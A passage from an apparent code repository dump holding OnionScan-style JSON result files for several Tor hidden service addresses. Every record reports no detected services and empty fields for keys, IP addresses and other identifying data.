{"hiddenService":"2ygbaoezjdmacnro.onion","webDetected":false,"sshDetected":false,"ricochetDetected":false,"ircDetected":false,"ftpDetected":false,"smtpDetected":false,"bitcoinDetected":false,"mongodbDetected":false,"vncDetected":false,"xmppDetected":false,"serverPoweredBy":"","serverVersion":"","foundApacheModStatus":false,"relatedOnionServices":null,"relatedOnionDomains":null,"linkedSites":null,"internalPages":null,"ipAddresses":null,"openDirectories":null,"exifImages":null,"interestingFiles":null,"pageReferencedDirectories":null,"pgpKeys":null,"hashes":null,"snapshot":"","pageTitle":"","responseHeaders":{},"bitcoinAddresses":null,"sshKey":"","ftpFingerprint":"","ftpBanner":"","smtpFingerprint":"","smtpBanner":""} 2 | -------------------------------------------------------------------------------- /onionrunner/onion_result/2ygdvjtirev3gw2z.onion.json: -------------------------------------------------------------------------------- 1 | {"hiddenService":"2ygdvjtirev3gw2z.onion","webDetected":false,"sshDetected":false,"ricochetDetected":false,"ircDetected":false,"ftpDetected":false,"smtpDetected":false,"bitcoinDetected":false,"mongodbDetected":false,"vncDetected":false,"xmppDetected":false,"serverPoweredBy":"","serverVersion":"","foundApacheModStatus":false,"relatedOnionServices":null,"relatedOnionDomains":null,"linkedSites":null,"internalPages":null,"ipAddresses":null,"openDirectories":null,"exifImages":null,"interestingFiles":null,"pageReferencedDirectories":null,"pgpKeys":null,"hashes":null,"snapshot":"","pageTitle":"","responseHeaders":{},"bitcoinAddresses":null,"sshKey":"","ftpFingerprint":"","ftpBanner":"","smtpFingerprint":"","smtpBanner":""} 2 | -------------------------------------------------------------------------------- /onionrunner/onion_result/2z3lfaxna6vwpw64.onion.json: -------------------------------------------------------------------------------- 1 | {"hiddenService":"2z3lfaxna6vwpw64.onion","webDetected":false,"sshDetected":false,"ricochetDetected":false,"ircDetected":false,"ftpDetected":false,"smtpDetected":false,"bitcoinDetected":false,"mongodbDetected":false,"vncDetected":false,"xmppDetected":false,"serverPoweredBy":"","serverVersion":"","foundApacheModStatus":false,"relatedOnionServices":null,"relatedOnionDomains":null,"linkedSites":null,"internalPages":null,"ipAddresses":null,"openDirectories":null,"exifImages":null,"interestingFiles":null,"pageReferencedDirectories":null,"pgpKeys":null,"hashes":null,"snapshot":"","pageTitle":"","responseHeaders":{},"bitcoinAddresses":null,"sshKey":"","ftpFingerprint":"","ftpBanner":"","smtpFingerprint":"","smtpBanner":""} 2 | -------------------------------------------------------------------------------- /onionrunner/onion_result/2z4hrgt4wnv7grvt.onion.json: -------------------------------------------------------------------------------- 1 | {"hiddenService":"2z4hrgt4wnv7grvt.onion","webDetected":false,"sshDetected":false,"ricochetDetected":false,"ircDetected":false,"ftpDetected":false,"smtpDetected":false,"bitcoinDetected":false,"mongodbDetected":false,"vncDetected":false,"xmppDetected":false,"serverPoweredBy":"","serverVersion":"","foundApacheModStatus":false,"relatedOnionServices":null,"relatedOnionDomains":null,"linkedSites":null,"internalPages":null,"ipAddresses":null,"openDirectories":null,"exifImages":null,"interestingFiles":null,"pageReferencedDirectories":null,"pgpKeys":null,"hashes":null,"snapshot":"","pageTitle":"","responseHeaders":{},"bitcoinAddresses":null,"sshKey":"","ftpFingerprint":"","ftpBanner":"","smtpFingerprint":"","smtpBanner":""} 2 | -------------------------------------------------------------------------------- /onionrunner/onion_result/2zcjxgh6xq4o3uvl.onion.json: -------------------------------------------------------------------------------- 1 | {"hiddenService":"2zcjxgh6xq4o3uvl.onion","webDetected":false,"sshDetected":false,"ricochetDetected":false,"ircDetected":false,"ftpDetected":false,"smtpDetected":false,"bitcoinDetected":false,"mongodbDetected":false,"vncDetected":false,"xmppDetected":false,"serverPoweredBy":"","serverVersion":"","foundApacheModStatus":false,"relatedOnionServices":null,"relatedOnionDomains":null,"linkedSites":null,"internalPages":null,"ipAddresses":null,"openDirectories":null,"exifImages":null,"interestingFiles":null,"pageReferencedDirectories":null,"pgpKeys":null,"hashes":null,"snapshot":"","pageTitle":"","responseHeaders":{},"bitcoinAddresses":null,"sshKey":"","ftpFingerprint":"","ftpBanner":"","smtpFingerprint":"","smtpBanner":""} 2 | -------------------------------------------------------------------------------- /onionrunner/onion_result/2zfg3roohcxbm22l.onion.json: -------------------------------------------------------------------------------- 1 | {"hiddenService":"2zfg3roohcxbm22l.onion","webDetected":false,"sshDetected":false,"ricochetDetected":false,"ircDetected":false,"ftpDetected":false,"smtpDetected":false,"bitcoinDetected":false,"mongodbDetected":false,"vncDetected":false,"xmppDetected":false,"serverPoweredBy":"","serverVersion":"","foundApacheModStatus":false,"relatedOnionServices":null,"relatedOnionDomains":null,"linkedSites":null,"internalPages":null,"ipAddresses":null,"openDirectories":null,"exifImages":null,"interestingFiles":null,"pageReferencedDirectories":null,"pgpKeys":null,"hashes":null,"snapshot":"","pageTitle":"","responseHeaders":{},"bitcoinAddresses":null,"sshKey":"","ftpFingerprint":"","ftpBanner":"","smtpFingerprint":"","smtpBanner":""} 2 | -------------------------------------------------------------------------------- /onionrunner/onion_result/2zif4jyng5dhfvxa.onion.json: -------------------------------------------------------------------------------- 1 | {"hiddenService":"2zif4jyng5dhfvxa.onion","webDetected":false,"sshDetected":false,"ricochetDetected":false,"ircDetected":false,"ftpDetected":false,"smtpDetected":false,"bitcoinDetected":false,"mongodbDetected":false,"vncDetected":false,"xmppDetected":false,"serverPoweredBy":"","serverVersion":"","foundApacheModStatus":false,"relatedOnionServices":null,"relatedOnionDomains":null,"linkedSites":null,"internalPages":null,"ipAddresses":null,"openDirectories":null,"exifImages":null,"interestingFiles":null,"pageReferencedDirectories":null,"pgpKeys":null,"hashes":null,"snapshot":"","pageTitle":"","responseHeaders":{},"bitcoinAddresses":null,"sshKey":"","ftpFingerprint":"","ftpBanner":"","smtpFingerprint":"","smtpBanner":""} 2 | -------------------------------------------------------------------------------- /onionrunner/onion_result/apple.onion.json: -------------------------------------------------------------------------------- 1 | {"hiddenService":"apple.onion","webDetected":false,"sshDetected":false,"ricochetDetected":false,"ircDetected":false,"ftpDetected":false,"smtpDetected":false,"bitcoinDetected":false,"mongodbDetected":false,"vncDetected":false,"xmppDetected":false,"serverPoweredBy":"","serverVersion":"","foundApacheModStatus":false,"relatedOnionServices":null,"relatedOnionDomains":null,"linkedSites":null,"internalPages":null,"ipAddresses":null,"openDirectories":null,"exifImages":null,"interestingFiles":null,"pageReferencedDirectories":null,"pgpKeys":null,"hashes":null,"snapshot":"","pageTitle":"","responseHeaders":{},"bitcoinAddresses":null,"sshKey":"","ftpFingerprint":"","ftpBanner":"","smtpFingerprint":"","smtpBanner":""} 2 | --------------------------------------------------------------------------------